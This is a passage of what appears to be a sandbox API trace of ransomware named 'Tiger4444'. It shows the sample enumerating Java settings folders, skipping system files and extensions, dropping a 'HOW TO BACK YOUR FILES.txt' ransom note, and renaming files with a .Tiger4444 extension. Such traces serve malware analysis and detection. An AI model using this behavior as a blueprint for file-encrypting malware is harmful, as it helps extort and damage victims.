lpString2=".") returned 1 [0059.533] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.533] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x88800d86, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x88800d86, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x88800d86, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.533] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.533] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.533] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0059.533] lstrcmpiW (lpString1="Java", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.533] lstrcmpiW (lpString1="Java", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.533] lstrcmpiW (lpString1="Java", lpString2="Tiger4444.exe") returned -1 [0059.533] lstrcmpiW (lpString1="Java", lpString2=".") returned 1 [0059.533] lstrcmpiW (lpString1="Java", lpString2="..") returned 1 [0059.533] lstrcmpiW (lpString1="Java", lpString2="windows") returned -1 [0059.534] lstrcmpiW (lpString1="Java", lpString2="bootmgr") returned 1 [0059.534] lstrcmpiW (lpString1="Java", lpString2="pagefile.sys") returned -1 [0059.534] lstrcmpiW (lpString1="Java", lpString2="boot") returned 1 [0059.534] lstrcmpiW (lpString1="Java", lpString2="ids.txt") returned 1 [0059.534] lstrcmpiW (lpString1="Java", lpString2="NTUSER.DAT") returned -1 [0059.534] lstrcpyW (in: lpString1=0x30aeaf2, lpString2="Java" | out: lpString1="Java") returned="Java" [0059.534] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666a0 [0059.534] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x54) returned 0xc765e8 [0059.534] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666a8 | out: ListHead=0xc66828, ListEntry=0xc666a8) returned 0xc664c8 [0059.534] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0059.534] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0059.534] lstrcpyW (in: lpString1=0x30aeaf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.534] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.535] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.536] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.536] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.536] CloseHandle (hObject=0x2b8) returned 1 [0059.536] CloseHandle (hObject=0x2c4) returned 1 [0059.536] GetCurrentThreadId () returned 0xfa8 [0059.536] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0059.536] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java" [0059.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765e8 | out: hHeap=0xc50000) returned 1 [0059.537] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0059.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java" [0059.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\" [0059.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3" [0059.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.538] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.555] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.556] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.556] CloseHandle (hObject=0x2c4) returned 1 [0059.557] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java") returned 41 [0059.557] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.557] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x88826fe8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0059.557] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.557] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.557] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.557] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.557] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x88826fe8, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.557] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.557] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.557] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.557] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.557] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.557] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x88826fe8, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x88826fe8, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8884d406, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.557] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.557] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.557] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="Tiger4444.exe") returned -1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2=".") returned 1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="..") returned 1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="windows") returned -1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="bootmgr") returned 1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="pagefile.sys") returned -1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="boot") returned 1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="ids.txt") returned -1 [0059.557] lstrcmpiW (lpString1="Deployment", lpString2="NTUSER.DAT") returned -1 [0059.558] lstrcpyW (in: lpString1=0x30aeafc, lpString2="Deployment" | out: lpString1="Deployment") returned="Deployment" [0059.558] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0059.558] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6a) returned 0xc89680 [0059.558] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0059.558] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x720729ee, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 0 [0059.558] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0059.558] lstrcpyW (in: lpString1=0x30aeafc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0059.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0059.559] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0059.559] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0059.560] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.560] CloseHandle (hObject=0x2b8) returned 1 [0059.560] CloseHandle (hObject=0x2c4) returned 1 [0059.560] GetCurrentThreadId () returned 0xfa8 [0059.560] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0059.560] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment" [0059.560] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0059.560] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0059.560] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment" [0059.560] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\" [0059.560] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" [0059.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0059.593] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0059.595] FlushFileBuffers (hFile=0x2c4) returned 1 [0059.597] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0059.597] CloseHandle (hObject=0x2c4) returned 1 [0059.598] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned 52 [0059.598] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.598] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x888997d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e88 [0059.598] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.598] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.598] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0059.598] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.598] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x720729ee, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x888997d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.598] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.598] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0059.598] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0059.598] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.599] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.599] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8884d406, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8884d406, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x888997d4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0059.599] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.599] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0059.599] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb084b30f, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb084b30f, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x7ab1bd35, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x2e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="deployment.properties", cAlternateFileName="DEPLOY~1.PRO")) returned 1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="Tiger4444.exe") returned -1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2=".") returned 1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="..") returned 1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="windows") returned -1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="bootmgr") returned 1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="pagefile.sys") returned -1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="boot") returned 1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="ids.txt") returned -1 [0059.599] lstrcmpiW (lpString1="deployment.properties", lpString2="NTUSER.DAT") returned -1 [0059.599] lstrcpyW (in: lpString1=0x30aeb12, lpString2="deployment.properties" | out: lpString1="deployment.properties") returned="deployment.properties" [0059.599] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties", dwFileAttributes=0x2000) returned 1 [0059.600] lstrlenW (lpString="deployment.properties") returned 21 [0059.600] lstrlenW (lpString="Tiger4444") returned 9 [0059.600] lstrcmpiW (lpString1="roperties", lpString2="Tiger4444") returned -1 [0059.600] lstrlenW (lpString=".dll") returned 4 [0059.600] lstrcmpiW (lpString1="ties", lpString2=".dll") returned 1 [0059.600] lstrlenW (lpString=".lnk") returned 4 [0059.600] lstrcmpiW (lpString1="ties", lpString2=".lnk") returned 1 [0059.600] lstrlenW (lpString=".ini") returned 4 [0059.600] lstrcmpiW (lpString1="ties", lpString2=".ini") returned 1 [0059.600] lstrlenW (lpString=".sys") returned 4 [0059.600] lstrcmpiW (lpString1="ties", lpString2=".sys") returned 1 [0059.600] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0059.600] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0059.600] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=15105336511) returned 1 [0059.600] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=745) returned 1 [0059.600] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0059.600] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0059.600] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f0, lpName=0x0) returned 0x2cc [0059.601] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f0) returned 0xbe0000 [0059.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0059.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0059.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0059.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0059.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0059.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0059.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0059.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0059.631] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=15108363372) returned 1 [0059.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0059.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0059.631] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0059.631] CloseHandle (hObject=0x2cc) returned 1 [0059.631] CloseHandle (hObject=0x2b8) returned 1 [0059.631] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.Tiger4444") returned 84 [0059.631] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.tiger4444"), dwFlags=0x1) returned 1 [0059.632] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xd337c3d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="log", cAlternateFileName="")) returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2="Tiger4444.exe") returned -1 [0059.632] lstrcmpiW (lpString1="log", lpString2=".") returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2="..") returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2="windows") returned -1 [0059.632] lstrcmpiW (lpString1="log", lpString2="bootmgr") returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2="pagefile.sys") returned -1 [0059.632] lstrcmpiW (lpString1="log", lpString2="boot") returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2="ids.txt") returned 1 [0059.632] lstrcmpiW (lpString1="log", lpString2="NTUSER.DAT") returned -1 [0059.632] lstrcpyW (in: lpString1=0x30aeb12, lpString2="log" | out: lpString1="log") returned="log" [0059.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0059.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x72) returned 0xc83710 [0059.632] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0059.632] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07d8c0f, 